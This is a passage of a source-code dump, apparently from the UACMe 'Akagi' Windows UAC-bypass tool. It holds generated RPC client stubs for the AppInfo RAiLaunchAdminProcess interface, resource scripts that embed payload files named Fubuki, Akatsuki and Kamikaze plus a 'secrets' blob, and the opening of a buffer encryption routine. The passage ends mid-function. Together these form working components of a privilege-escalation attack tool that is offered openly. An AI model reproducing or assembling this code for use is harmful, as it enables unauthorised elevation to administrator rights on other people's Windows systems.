1.0, GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */ static const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}}, {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 0, 0, 0, 0, 0, 0x00000000 }; RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface; extern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc; static RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle; /* [async] */ void RAiLaunchAdminProcess( /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle, handle_t hBinding, /* [string][unique][in] */ wchar_t *ExecutablePath, /* [string][unique][in] */ wchar_t *CommandLine, /* [in] */ long StartFlags, /* [in] */ long CreationFlags, /* [string][in] */ wchar_t *CurrentDirectory, /* [string][in] */ wchar_t *WindowStation, /* [in] */ struct _APP_STARTUP_INFO *StartupInfo, /* [in] */ unsigned __int3264 hWnd, /* [in] */ long Timeout, /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation, /* [out] */ long *ElevationType) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc, (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0], RAiLaunchAdminProcess_AsyncHandle, hBinding, ExecutablePath, CommandLine, StartFlags, CreationFlags, CurrentDirectory, WindowStation, StartupInfo, hWnd, Timeout, ProcessInformation, ElevationType); } #if !defined(__RPC_WIN64__) #error Invalid build platform for this stub. 
#endif static const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString = { 0, { /* Procedure RAiLaunchAdminProcess */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 2 */ NdrFcLong( 0x0 ), /* 0 */ /* 6 */ NdrFcShort( 0x0 ), /* 0 */ /* 8 */ NdrFcShort( 0x70 ), /* X64 Stack size/offset = 112 */ /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 12 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ /* 14 */ NdrFcShort( 0x20 ), /* 32 */ /* 16 */ NdrFcShort( 0x24 ), /* 36 */ /* 18 */ 0xc7, /* Oi2 Flags: srv must size, clt must size, has return, has ext, has async handle */ 0xc, /* 12 */ /* 20 */ 0xa, /* 10 */ 0x1, /* Ext Flags: new corr desc, */ /* 22 */ NdrFcShort( 0x0 ), /* 0 */ /* 24 */ NdrFcShort( 0x0 ), /* 0 */ /* 26 */ NdrFcShort( 0x0 ), /* 0 */ /* 28 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter ExecutablePath */ /* 30 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ /* 32 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ /* 34 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ /* Parameter CommandLine */ /* 36 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ /* 38 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ /* 40 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ /* Parameter StartFlags */ /* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 44 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ /* 46 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter CreationFlags */ /* 48 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 50 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ /* 52 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter CurrentDirectory */ /* 54 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 56 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ /* 58 */ NdrFcShort( 0x8 ), /* Type Offset=8 */ /* Parameter WindowStation */ /* 60 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 62 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ /* 64 */ 
NdrFcShort( 0x8 ), /* Type Offset=8 */ /* Parameter StartupInfo */ /* 66 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 68 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ /* 70 */ NdrFcShort( 0x16 ), /* Type Offset=22 */ /* Parameter hWnd */ /* 72 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 74 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ /* 76 */ 0xb9, /* FC_UINT3264 */ 0x0, /* 0 */ /* Parameter Timeout */ /* 78 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 80 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ /* 82 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter ProcessInformation */ /* 84 */ NdrFcShort( 0x6113 ), /* Flags: must size, must free, out, simple ref, srv alloc size=24 */ /* 86 */ NdrFcShort( 0x58 ), /* X64 Stack size/offset = 88 */ /* 88 */ NdrFcShort( 0x38 ), /* Type Offset=56 */ /* Parameter ElevationType */ /* 90 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 92 */ NdrFcShort( 0x60 ), /* X64 Stack size/offset = 96 */ /* 94 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 96 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 98 */ NdrFcShort( 0x68 ), /* X64 Stack size/offset = 104 */ /* 100 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ 0x0 } }; static const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString = { 0, { NdrFcShort( 0x0 ), /* 0 */ /* 2 */ 0x12, 0x8, /* FC_UP [simple_pointer] */ /* 4 */ 0x25, /* FC_C_WSTRING */ 0x5c, /* FC_PAD */ /* 6 */ 0x11, 0x8, /* FC_RP [simple_pointer] */ /* 8 */ 0x25, /* FC_C_WSTRING */ 0x5c, /* FC_PAD */ /* 10 */ 0x11, 0x0, /* FC_RP */ /* 12 */ NdrFcShort( 0xa ), /* Offset= 10 (22) */ /* 14 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 16 */ NdrFcShort( 0x8 ), /* 8 */ /* 18 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 20 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 22 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x3, /* 3 */ /* 24 */ NdrFcShort( 0x38 ), /* 56 */ /* 26 */ NdrFcShort( 0x0 ), /* 0 */ /* 28 */ 
NdrFcShort( 0x14 ), /* Offset= 20 (48) */ /* 30 */ 0x36, /* FC_POINTER */ 0x8, /* FC_LONG */ /* 32 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 34 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 36 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 38 */ 0x8, /* FC_LONG */ 0x6, /* FC_SHORT */ /* 40 */ 0x3e, /* FC_STRUCTPAD2 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ /* 42 */ 0x0, /* 0 */ NdrFcShort( 0xffe3 ), /* Offset= -29 (14) */ 0x40, /* FC_STRUCTPAD4 */ /* 46 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 48 */ 0x12, 0x8, /* FC_UP [simple_pointer] */ /* 50 */ 0x5, /* FC_WCHAR */ 0x5c, /* FC_PAD */ /* 52 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 54 */ NdrFcShort( 0x2 ), /* Offset= 2 (56) */ /* 56 */ 0x1a, /* FC_BOGUS_STRUCT */ 0x3, /* 3 */ /* 58 */ NdrFcShort( 0x18 ), /* 24 */ /* 60 */ NdrFcShort( 0x0 ), /* 0 */ /* 62 */ NdrFcShort( 0x0 ), /* Offset= 0 (62) */ /* 64 */ 0xb9, /* FC_UINT3264 */ 0xb9, /* FC_UINT3264 */ /* 66 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 68 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 70 */ 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ /* 72 */ 0x8, /* FC_LONG */ 0x5c, /* FC_PAD */ 0x0 } }; static const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] = { 0 }; static const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = { (void *)& LaunchAdminProcess___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &LaunchAdminProcess__MIDL_AutoBindHandle, 0, 0, 0, 0, appinfo__MIDL_TypeFormatString.Format, 1, /* -error bounds_check flag */ 0x50002, /* Ndr library version */ 0, 0x801026e, /* MIDL Version 8.1.622 */ 0, 0, 0, /* notify & notify_flag routine table */ 0x1, /* MIDL flag */ 0, /* cs routines */ 0, /* proxy/server info */ 0 }; #if _MSC_VER >= 1200 #pragma warning(pop) #endif #else #pragma warning(disable:4206) #endif /* defined(_M_AMD64)*/ ================================================ FILE: Source/Akagi/appinfo/x64/appinfo64.h ================================================ /* this ALWAYS GENERATED file contains the 
definitions for the interfaces */ /* File created by MIDL compiler version 8.01.0622 */ /* at Mon Jan 18 19:14:07 2038 */ /* Compiler settings for appinfo.idl: Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 protocol : dce , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: __declspec(uuid()), __declspec(selectany), __declspec(novtable) DECLSPEC_UUID(), MIDL_INTERFACE() */ /* @@MIDL_FILE_HEADING( ) */ #pragma warning( disable: 4049 ) /* more than 64k source lines */ /* verify that the version is high enough to compile this file*/ #ifndef __REQUIRED_RPCNDR_H_VERSION__ #define __REQUIRED_RPCNDR_H_VERSION__ 475 #endif #include "rpc.h" #include "rpcndr.h" #ifndef __RPCNDR_H_VERSION__ #error this stub requires an updated version of #endif /* __RPCNDR_H_VERSION__ */ #ifndef __appinfo64_h__ #define __appinfo64_h__ #if defined(_MSC_VER) && (_MSC_VER >= 1020) #pragma once #endif /* Forward Declarations */ /* header files for imported files */ #include "oaidl.h" #include "ocidl.h" #ifdef __cplusplus extern "C"{ #endif #ifndef __LaunchAdminProcess_INTERFACE_DEFINED__ #define __LaunchAdminProcess_INTERFACE_DEFINED__ /* interface LaunchAdminProcess */ /* [version][uuid] */ typedef struct _MONITOR_POINT { long MonitorLeft; long MonitorRight; } MONITOR_POINT; typedef struct _APP_STARTUP_INFO { wchar_t *lpszTitle; long dwX; long dwY; long dwXSize; long dwYSize; long dwXCountChars; long dwYCountChars; long dwFillAttribute; long dwFlags; short wShowWindow; struct _MONITOR_POINT MonitorPoint; } APP_STARTUP_INFO; typedef struct _APP_PROCESS_INFORMATION { unsigned __int3264 ProcessHandle; unsigned __int3264 ThreadHandle; long ProcessId; long ThreadId; } APP_PROCESS_INFORMATION; /* [async] */ void RAiLaunchAdminProcess( /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle, handle_t hBinding, /* [string][unique][in] */ wchar_t *ExecutablePath, /* [string][unique][in] */ wchar_t *CommandLine, /* [in] 
*/ long StartFlags, /* [in] */ long CreationFlags, /* [string][in] */ wchar_t *CurrentDirectory, /* [string][in] */ wchar_t *WindowStation, /* [in] */ struct _APP_STARTUP_INFO *StartupInfo, /* [in] */ unsigned __int3264 hWnd, /* [in] */ long Timeout, /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation, /* [out] */ long *ElevationType); extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec; extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec; #endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */ /* Additional Prototypes for ALL interfaces */ /* end of Additional Prototypes */ #ifdef __cplusplus } #endif #endif ================================================ FILE: Source/Akagi/appinfo/x86-32/appinfo32.c ================================================ /* this ALWAYS GENERATED file contains the RPC client stubs */ /* File created by MIDL compiler version 8.01.0622 */ /* at Mon Jan 18 19:14:07 2038 */ /* Compiler settings for appinfo.idl: Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622 protocol : dce , ms_ext, c_ext, robust error checks: allocation ref bounds_check enum stub_data VC __declspec() decoration level: __declspec(uuid()), __declspec(selectany), __declspec(novtable) DECLSPEC_UUID(), MIDL_INTERFACE() */ /* @@MIDL_FILE_HEADING( ) */ #if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) #pragma warning( disable: 4049 ) /* more than 64k source lines */ #if _MSC_VER >= 1200 #pragma warning(push) #endif #pragma warning( disable: 4211 ) /* redefine extern to static */ #pragma warning( disable: 4232 ) /* dllimport identity*/ #pragma warning( disable: 4024 ) /* array to pointer mapping*/ #pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */ #pragma optimize("", off ) #include "appinfo32.h" #define TYPE_FORMAT_STRING_SIZE 75 #define PROC_FORMAT_STRING_SIZE 101 #define EXPR_FORMAT_STRING_SIZE 1 #define TRANSMIT_AS_TABLE_SIZE 0 #define WIRE_MARSHAL_TABLE_SIZE 0 typedef struct _appinfo_MIDL_TYPE_FORMAT_STRING { 
short Pad; unsigned char Format[ TYPE_FORMAT_STRING_SIZE ]; } appinfo_MIDL_TYPE_FORMAT_STRING; typedef struct _appinfo_MIDL_PROC_FORMAT_STRING { short Pad; unsigned char Format[ PROC_FORMAT_STRING_SIZE ]; } appinfo_MIDL_PROC_FORMAT_STRING; typedef struct _appinfo_MIDL_EXPR_FORMAT_STRING { long Pad; unsigned char Format[ EXPR_FORMAT_STRING_SIZE ]; } appinfo_MIDL_EXPR_FORMAT_STRING; static const RPC_SYNTAX_IDENTIFIER _RpcTransferSyntax = {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}; extern const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString; extern const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString; extern const appinfo_MIDL_EXPR_FORMAT_STRING appinfo__MIDL_ExprFormatString; #define GENERIC_BINDING_TABLE_SIZE 0 /* Standard interface: LaunchAdminProcess, ver. 1.0, GUID={0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}} */ static const RPC_CLIENT_INTERFACE LaunchAdminProcess___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x201ef99a,0x7fa0,0x444c,{0x93,0x99,0x19,0xba,0x84,0xf1,0x2a,0x1a}},{1,0}}, {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}}, 0, 0, 0, 0, 0, 0x00000000 }; RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec = (RPC_IF_HANDLE)& LaunchAdminProcess___RpcClientInterface; extern const MIDL_STUB_DESC LaunchAdminProcess_StubDesc; static RPC_BINDING_HANDLE LaunchAdminProcess__MIDL_AutoBindHandle; /* [async] */ void RAiLaunchAdminProcess( /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle, handle_t hBinding, /* [string][unique][in] */ wchar_t *ExecutablePath, /* [string][unique][in] */ wchar_t *CommandLine, /* [in] */ long StartFlags, /* [in] */ long CreationFlags, /* [string][in] */ wchar_t *CurrentDirectory, /* [string][in] */ wchar_t *WindowStation, /* [in] */ struct _APP_STARTUP_INFO *StartupInfo, /* [in] */ unsigned __int3264 hWnd, /* [in] */ long Timeout, /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation, /* [out] 
*/ long *ElevationType) { NdrAsyncClientCall( ( PMIDL_STUB_DESC )&LaunchAdminProcess_StubDesc, (PFORMAT_STRING) &appinfo__MIDL_ProcFormatString.Format[0], ( unsigned char * )&RAiLaunchAdminProcess_AsyncHandle); } #if !defined(__RPC_WIN32__) #error Invalid build platform for this stub. #endif #if !(TARGET_IS_NT50_OR_LATER) #error You need Windows 2000 or later to run this stub because it uses these features: #error [async] attribute, /robust command line switch. #error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems. #error This app will fail with the RPC_X_WRONG_STUB_VERSION error. #endif static const appinfo_MIDL_PROC_FORMAT_STRING appinfo__MIDL_ProcFormatString = { 0, { /* Procedure RAiLaunchAdminProcess */ 0x0, /* 0 */ 0x48, /* Old Flags: */ /* 2 */ NdrFcLong( 0x0 ), /* 0 */ /* 6 */ NdrFcShort( 0x0 ), /* 0 */ /* 8 */ NdrFcShort( 0x38 ), /* x86 Stack size/offset = 56 */ /* 10 */ 0x32, /* FC_BIND_PRIMITIVE */ 0x0, /* 0 */ /* 12 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */ /* 14 */ NdrFcShort( 0x9a ), /* 154 */ /* 16 */ NdrFcShort( 0x58 ), /* 88 */ /* 18 */ 0xc6, /* Oi2 Flags: clt must size, has return, has ext, has async handle */ 0xc, /* 12 */ /* 20 */ 0x8, /* 8 */ 0x1, /* Ext Flags: new corr desc, */ /* 22 */ NdrFcShort( 0x0 ), /* 0 */ /* 24 */ NdrFcShort( 0x0 ), /* 0 */ /* 26 */ NdrFcShort( 0x0 ), /* 0 */ /* Parameter ExecutablePath */ /* 28 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ /* 30 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */ /* 32 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ /* Parameter CommandLine */ /* 34 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ /* 36 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */ /* 38 */ NdrFcShort( 0x2 ), /* Type Offset=2 */ /* Parameter StartFlags */ /* 40 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 42 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */ /* 44 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter 
CreationFlags */ /* 46 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 48 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */ /* 50 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter CurrentDirectory */ /* 52 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 54 */ NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */ /* 56 */ NdrFcShort( 0x8 ), /* Type Offset=8 */ /* Parameter WindowStation */ /* 58 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ /* 60 */ NdrFcShort( 0x1c ), /* x86 Stack size/offset = 28 */ /* 62 */ NdrFcShort( 0x8 ), /* Type Offset=8 */ /* Parameter StartupInfo */ /* 64 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ /* 66 */ NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */ /* 68 */ NdrFcShort( 0x16 ), /* Type Offset=22 */ /* Parameter hWnd */ /* 70 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 72 */ NdrFcShort( 0x24 ), /* x86 Stack size/offset = 36 */ /* 74 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter Timeout */ /* 76 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ /* 78 */ NdrFcShort( 0x28 ), /* x86 Stack size/offset = 40 */ /* 80 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Parameter ProcessInformation */ /* 82 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ /* 84 */ NdrFcShort( 0x2c ), /* x86 Stack size/offset = 44 */ /* 86 */ NdrFcShort( 0x3c ), /* Type Offset=60 */ /* Parameter ElevationType */ /* 88 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ /* 90 */ NdrFcShort( 0x30 ), /* x86 Stack size/offset = 48 */ /* 92 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ /* Return value */ /* 94 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ /* 96 */ NdrFcShort( 0x34 ), /* x86 Stack size/offset = 52 */ /* 98 */ 0x8, /* FC_LONG */ 0x0, /* 0 */ 0x0 } }; static const appinfo_MIDL_TYPE_FORMAT_STRING appinfo__MIDL_TypeFormatString = { 0, { NdrFcShort( 0x0 ), /* 0 */ /* 2 */ 0x12, 0x8, /* FC_UP 
[simple_pointer] */ /* 4 */ 0x25, /* FC_C_WSTRING */ 0x5c, /* FC_PAD */ /* 6 */ 0x11, 0x8, /* FC_RP [simple_pointer] */ /* 8 */ 0x25, /* FC_C_WSTRING */ 0x5c, /* FC_PAD */ /* 10 */ 0x11, 0x0, /* FC_RP */ /* 12 */ NdrFcShort( 0xa ), /* Offset= 10 (22) */ /* 14 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 16 */ NdrFcShort( 0x8 ), /* 8 */ /* 18 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 20 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 22 */ 0x16, /* FC_PSTRUCT */ 0x3, /* 3 */ /* 24 */ NdrFcShort( 0x30 ), /* 48 */ /* 26 */ 0x4b, /* FC_PP */ 0x5c, /* FC_PAD */ /* 28 */ 0x46, /* FC_NO_REPEAT */ 0x5c, /* FC_PAD */ /* 30 */ NdrFcShort( 0x0 ), /* 0 */ /* 32 */ NdrFcShort( 0x0 ), /* 0 */ /* 34 */ 0x12, 0x8, /* FC_UP [simple_pointer] */ /* 36 */ 0x5, /* FC_WCHAR */ 0x5c, /* FC_PAD */ /* 38 */ 0x5b, /* FC_END */ 0x8, /* FC_LONG */ /* 40 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 42 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 44 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 46 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 48 */ 0x6, /* FC_SHORT */ 0x3e, /* FC_STRUCTPAD2 */ /* 50 */ 0x4c, /* FC_EMBEDDED_COMPLEX */ 0x0, /* 0 */ /* 52 */ NdrFcShort( 0xffda ), /* Offset= -38 (14) */ /* 54 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 56 */ 0x11, 0x4, /* FC_RP [alloced_on_stack] */ /* 58 */ NdrFcShort( 0x2 ), /* Offset= 2 (60) */ /* 60 */ 0x15, /* FC_STRUCT */ 0x3, /* 3 */ /* 62 */ NdrFcShort( 0x10 ), /* 16 */ /* 64 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 66 */ 0x8, /* FC_LONG */ 0x8, /* FC_LONG */ /* 68 */ 0x5c, /* FC_PAD */ 0x5b, /* FC_END */ /* 70 */ 0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */ /* 72 */ 0x8, /* FC_LONG */ 0x5c, /* FC_PAD */ 0x0 } }; static const unsigned short LaunchAdminProcess_FormatStringOffsetTable[] = { 0 }; static const MIDL_STUB_DESC LaunchAdminProcess_StubDesc = { (void *)& LaunchAdminProcess___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &LaunchAdminProcess__MIDL_AutoBindHandle, 0, 0, 0, 0, appinfo__MIDL_TypeFormatString.Format, 1, /* 
-error bounds_check flag */
    0x50002, /* Ndr library version */
    0,
    0x801026e, /* MIDL Version 8.1.622 */
    0,
    0,
    0,  /* notify & notify_flag routine table */
    0x1, /* MIDL flag */
    0, /* cs routines */
    0,   /* proxy/server info */
    0
    };

#if _MSC_VER >= 1200
#pragma warning(pop)
#endif

#else
#pragma warning(disable:4206)
#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */

================================================
FILE: Source/Akagi/appinfo/x86-32/appinfo32.h
================================================

/* this ALWAYS GENERATED file contains the definitions for the interfaces */

/* File created by MIDL compiler version 8.01.0622 */
/* at Mon Jan 18 19:14:07 2038 */

/* Compiler settings for appinfo.idl:
    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0622
    protocol : dce , ms_ext, c_ext, robust
    error checks: allocation ref bounds_check enum stub_data
    VC __declspec() decoration level:
         __declspec(uuid()), __declspec(selectany), __declspec(novtable)
         DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */

#pragma warning( disable: 4049 ) /* more than 64k source lines */

/* verify that the version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of
#endif /* __RPCNDR_H_VERSION__ */

#ifndef __appinfo32_h__
#define __appinfo32_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */

/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"

#ifdef __cplusplus
extern "C"{
#endif

#ifndef __LaunchAdminProcess_INTERFACE_DEFINED__
#define __LaunchAdminProcess_INTERFACE_DEFINED__

/* interface LaunchAdminProcess */
/* [version][uuid] */

typedef struct _MONITOR_POINT
{
    long MonitorLeft;
    long MonitorRight;
} MONITOR_POINT;

typedef struct _APP_STARTUP_INFO
{
    wchar_t *lpszTitle;
    long dwX;
    long dwY;
    long
dwXSize;
    long dwYSize;
    long dwXCountChars;
    long dwYCountChars;
    long dwFillAttribute;
    long dwFlags;
    short wShowWindow;
    struct _MONITOR_POINT MonitorPoint;
} APP_STARTUP_INFO;

typedef struct _APP_PROCESS_INFORMATION
{
    unsigned __int3264 ProcessHandle;
    unsigned __int3264 ThreadHandle;
    long ProcessId;
    long ThreadId;
} APP_PROCESS_INFORMATION;

/* [async] */ void RAiLaunchAdminProcess(
    /* [in] */ PRPC_ASYNC_STATE RAiLaunchAdminProcess_AsyncHandle,
    handle_t hBinding,
    /* [string][unique][in] */ wchar_t *ExecutablePath,
    /* [string][unique][in] */ wchar_t *CommandLine,
    /* [in] */ long StartFlags,
    /* [in] */ long CreationFlags,
    /* [string][in] */ wchar_t *CurrentDirectory,
    /* [string][in] */ wchar_t *WindowStation,
    /* [in] */ struct _APP_STARTUP_INFO *StartupInfo,
    /* [in] */ unsigned __int3264 hWnd,
    /* [in] */ long Timeout,
    /* [out] */ struct _APP_PROCESS_INFORMATION *ProcessInformation,
    /* [out] */ long *ElevationType);

extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_c_ifspec;
extern RPC_IF_HANDLE LaunchAdminProcess_v1_0_s_ifspec;
#endif /* __LaunchAdminProcess_INTERFACE_DEFINED__ */

/* Additional Prototypes for ALL interfaces */

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif

================================================
FILE: Source/Akagi/bin/Akatsuki64.cd
================================================

================================================
FILE: Source/Akagi/bin/Fubuki32.cd
================================================

================================================
FILE: Source/Akagi/bin/Fubuki64.cd
================================================

================================================
FILE: Source/Akagi/bin/Kamikaze.cd
================================================

================================================
FILE: Source/Akagi/bin32res.rc
================================================

#include "bin32res.h"
#include "winres.h"

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US

IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets32.bin"

================================================
FILE: Source/Akagi/bin64res.rc
================================================

#include "bin64res.h"
#include "winres.h"

LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US

IDR_FUBUKI64 RCDATA "bin\\fubuki64.cd"
IDR_FUBUKI32 RCDATA "bin\\fubuki32.cd"
IDR_AKATSUKI64 RCDATA "bin\\akatsuki64.cd"
IDR_KAMIKAZE RCDATA "bin\\kamikaze.cd"
IDR_SECRETS RCDATA "bin\\secrets64.bin"

================================================
FILE: Source/Akagi/compress.c
================================================

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2026
*
*  TITLE:       COMPRESS.C
*
*  VERSION:     3.69
*
*  DATE:        12 Feb 2026
*
*  Compression and encoding/decoding support.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"
#include "encresource.h"

#pragma comment(lib, "msdelta.lib")
#pragma comment(lib, "Bcrypt.lib")

#define UACME_KEY_SIZE 32

typedef struct _DCK_HEADER {
    DWORD Id;
    BYTE Data[UACME_KEY_SIZE];
} DCK_HEADER, * PDCK_HEADER;

/*
* EncodeBuffer
*
* Purpose:
*
* Decrypt/Encrypt given buffer.
*
*/
VOID EncodeBuffer(
    _In_ PVOID Buffer,
    _In_ ULONG BufferSize,
    _In_ ULONG Key
)
{
    ULONG k, c;
    PUCHAR ptr;

    if ((Buffer == NULL) || (BufferSize == 0))
        return;

